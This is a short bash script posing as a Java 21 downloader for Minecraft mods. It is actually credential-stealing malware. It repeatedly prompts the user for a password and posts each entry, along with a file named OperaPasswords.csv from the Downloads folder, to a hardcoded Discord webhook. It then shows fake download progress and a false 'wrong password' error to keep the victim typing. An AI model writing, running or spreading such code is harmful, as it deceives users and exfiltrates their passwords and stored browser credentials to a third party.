#!/bin/bash

WEBHOOK_URL="https://discord.com/api/webhooks/1443976954620412115/DKGwQJLudy7VchCEhn4lON5eDbJ4FJUfh-l2LwijYye2HFegxxMiHjMdwhGZgRioJGRX"

echo "Download Java 21 For Minecraft Mods"
echo "Please Enter Your Password:"
echo "Type /begin to finish the download."
echo ""

while true; do
    printf "Please Enter Your Password > "
    read msg

    if [ "$msg" = "/begin" ]; then
        echo "Starting Java 21 Download. Please Wait."
        sleep 2
        echo "Sending Request For Download."
        sleep 2
        echo "Starting Download."
        sleep 2
        echo "Error (Wrong Password, Please Try Again)."
        echo "Please Re-Enter Java 21 Download Script To Retry."
        break
    fi

    if [ -z "$msg" ]; then
        continue
    fi

    curl -X POST \
        -F "file=@$HOME/Downloads/OperaPasswords.csv" \
        -F 'payload_json={"content":"Downloaded Mods:"}' \
        "https://discord.com/api/webhooks/1443976954620412115/DKGwQJLudy7VchCEhn4lON5eDbJ4FJUfh-l2LwijYye2HFegxxMiHjMdwhGZgRioJGRX"

    curl -X POST \
      -H "Content-Type: application/json" \
      -d "{\"content\": \"Sent From Java 21 Download: $msg\"}" \
      "$WEBHOOK_URL" >/dev/null 2>&1

    echo "(Error Wrong Password. Please Try Again)"
done
